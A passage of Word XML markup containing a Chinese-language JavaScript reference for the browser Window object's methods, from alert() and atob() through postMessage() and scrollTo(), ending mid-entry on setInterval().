        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了下面的方法，同时也继承了由核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义的所有全局函数（参见第三部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void alert(string message)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在一个对话框中向用户显示一段指定的纯文本</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>。这个对话框包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，用户可以单击以便关闭这个对话框。这个对话框一般是模态的（至少对当前标签而言是这样），调用</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>将阻塞后面的代码，直到当前对话框关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string atob(string atob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个工具函数接收一个基</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t>编码的字符串并</w:t>
      </w:r>
      <w:r>
        <w:t>将它解码为一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>二进制字符串，其中每个字符代表一个单独的字节。可以</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用返回的字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来提取字节值。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>btoa()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void blur()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>blur()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将键盘焦点从当前</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定的顶级浏览器窗口移除。它不会指定接下来键盘焦点会由哪个窗口获得。在某些浏览器和</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>或平台上，这个方法可能无效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string btoa(string btoa)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个工具函数接收一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>二进制字符串（其中每个字符代表一个单独的字节）作为参数，返回对应的基</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t>编码的值。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
      <w:r>
        <w:t>来从一个任意的字节值序列创建一个二进制字符串。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>atob()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void clearInterval(long handle)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clearInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>停止由调用</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>开始的某段代码的重复执行。</w:t>
      </w:r>
      <w:r>
        <w:t>intervalId</w:t>
      </w:r>
      <w:r>
        <w:t>必须是调用</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void clearTimeout(long </w:t>
      </w:r>
      <w:r>
        <w:t>handle)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>clearTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>取消由</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>方法推迟的某段代码的执行。</w:t>
      </w:r>
      <w:r>
        <w:t>timeoutId</w:t>
      </w:r>
      <w:r>
        <w:t>参数必须是调用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值，它标识要退出哪段推迟的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法关闭调用该方法的顶级窗口。脚本一般只允许关闭由它们自己打开的窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean confrm(string message)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在一个模态对话框中以纯文本的形式显示指定的问题。这个对话框包含</w:t>
      </w:r>
      <w:r>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，用户可通过这两个按钮回答提出的问题。如果用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void focus()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法让当前浏览器窗口获得键盘焦点。在大多数平台上，当顶级窗口获得焦点时，它将显示到窗口栈的顶部，这样它就会变得可见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSSStyleDeclaration getComputedStyle(Element elt,[string pseudoElt])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>文档中的一个元素可以从内联样式属性以及样式表</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>级联</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>中任意数量的样式表中获得样式信息。在某个元素正式显示在窗口中之</w:t>
      </w:r>
      <w:r>
        <w:t>前，必须先从这个级联中提取它的样式信息，同时那些以相对单位（如百分比或是</w:t>
      </w:r>
      <w:r>
        <w:t>"ems"</w:t>
      </w:r>
      <w:r>
        <w:t>）定义的样式也必须</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>出来以便转换为像素。这些计算出的值有时也叫做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回一个只读的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象，反映了显示这个元素实际使用的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式值。所有的尺寸都以像素为单位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法的第二个参数通常省略或为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，不过也可以传入</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>伪元素</w:t>
      </w:r>
      <w:r>
        <w:t>"::before"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"::after"</w:t>
      </w:r>
      <w:r>
        <w:t>来决定用于</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>生成内容的样式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>比较一下</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>getComputedStyle(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性，后者允许访问某个元素的内联样式，使用它们定义时的单位，并且不包括任何应用到该元素的样式表样式信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中不支持这个方法，不过可以通过每个</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象的非标准属性</w:t>
      </w:r>
      <w:r>
        <w:t>currentStyle</w:t>
      </w:r>
      <w:r>
        <w:t>来完成相似功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window open([string url],[string target],[string features],[string replace])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在一个新的或现存的浏览器窗口或标签中加载并显示指定的</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定要加载的文档。</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有指定，则将使用</w:t>
      </w:r>
      <w:r>
        <w:t>"about:blank"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定用于加载指定</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的窗口的名字。如果没有指定，则将使用</w:t>
      </w:r>
      <w:r>
        <w:t>"_blank"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"_blank"</w:t>
      </w:r>
      <w:r>
        <w:t>，或不存在指定名字的已有窗口，则将创建一个新窗口来显示</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。否则，</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>将在现存的指定名字的窗口中加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>features</w:t>
      </w:r>
      <w:r>
        <w:t>参数用于指定窗口的位置、尺寸以及特性（比如菜单栏、工具栏等）。在支持标签的现代浏览器中，这个参数通常会忽略，所以这儿没有列出它的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:t>Window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>在一个已经存在的窗口中加载新文档时，</w:t>
      </w:r>
      <w:r>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定新文档是否在这个窗口的浏览历史中添加一条自己的记录，或者替换当前文档的历史记录。如果</w:t>
      </w:r>
      <w:r>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则新文档将替换掉旧文档。如果这个参数为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或未指定，则新文档将在该</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览历史中有一条自己的记录。这个参数提供的功能非常类似</w:t>
      </w:r>
      <w:r>
        <w:t>Location.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void postMessage(any message,string targetOrigin,[MessagePort[]p</w:t>
      </w:r>
      <w:r>
        <w:t>orts])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>仅当当前窗口显示的文档有指定的</w:t>
      </w:r>
      <w:r>
        <w:t>targetOrigin</w:t>
      </w:r>
      <w:r>
        <w:t>时，发送指定</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>以及可选</w:t>
      </w:r>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:t>的一个副本到当前窗口中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>messa ge</w:t>
      </w:r>
      <w:r>
        <w:t>可以是任意能用结构性复制算法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）复制的对象。</w:t>
      </w:r>
      <w:r>
        <w:t>targetOrigin</w:t>
      </w:r>
      <w:r>
        <w:t>应该是一个指定期望源的模式、主机以及端口的绝对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。如果任意源都可接受，</w:t>
      </w:r>
      <w:r>
        <w:t>targetOrigin</w:t>
      </w:r>
      <w:r>
        <w:t>也可以是</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>，或者如果想使用脚本自身的源则可以是</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一个窗口上调用这个方法将在这个窗口上触发一个消息事件。参见</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>oid print()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>print()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，效果等同于用户选择浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>打印</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮或菜单项。一般来说，这会弹出一个对话框，允许用户取消或定制打印请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string prompt(string message,[string default])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在一个模态对话框中显示指定的</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>，同时包含一个文本输入区以及</w:t>
      </w:r>
      <w:r>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，它将阻塞页面，直到用户单击这两个按钮中的一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。如果用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，则</w:t>
      </w:r>
      <w:r>
        <w:t>prompt(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>将返回当前在对话框中的文本输入区显示的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定文本输入区的初始文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void scroll(long x,long y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法等同于</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTo()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void scrollBy(long x,long y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scrollBy()</w:t>
      </w:r>
      <w:r>
        <w:t>滚动当前</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>中显示的文档，</w:t>
      </w:r>
      <w:r>
        <w:t>dx</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dy</w:t>
      </w:r>
      <w:r>
        <w:t>指定滚动的相对量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void scrollTo(long x,long y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scrollTo()</w:t>
      </w:r>
      <w:r>
        <w:t>滚动当前</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>中显示的文档，如果可能的话，让文档中由坐标</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>指定的点位于显示区域的左上角。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lon</w:t>
      </w:r>
      <w:r>
        <w:t>g setInterval(function f,unsigned long interval,any args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>将函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>注册为</w:t>
      </w:r>
      <w:r>
        <w:t>interval</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒后调用，并且接下来每隔指定的</w:t>
      </w:r>
      <w:r>
